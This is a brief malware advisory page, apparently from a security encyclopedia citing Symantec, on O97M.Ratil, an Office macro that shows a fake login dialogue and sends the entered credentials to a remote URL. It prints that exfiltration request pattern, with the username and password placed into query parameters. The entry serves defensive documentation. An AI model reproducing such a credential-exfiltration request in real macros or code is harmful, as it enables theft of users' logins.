Home / malwarePDF  

O97M.Ratil


First posted on 29 May 2014.
Source: Symantec

Aliases :

There are no other names known for O97M.Ratil.

Explanation :

The infected Microsoft Word and Microsoft Excel files contain macro code that sends a request to the following URL:
[http://]www.palmettogoodwill.org/files/report[REMOVED]MACRO_EXECUTED_WORD_SYNTA_PHARMA_P_ONLY&uname=NULL&pword=NULL

It then displays a dialogue box asking for user credentials.



When the user clicks OK, the macro code sends the stolen credentials to the following URL:
[http://]www.palmettogoodwill.org/files/report[REMOVED]SYNTA_PHARMA&uname=" & [USER NAME] & "&pword=" & [PASSWORD]

It then displays an image of a document from the Commonwealth of Massachusetts.

Last update 29 May 2014

 

TOP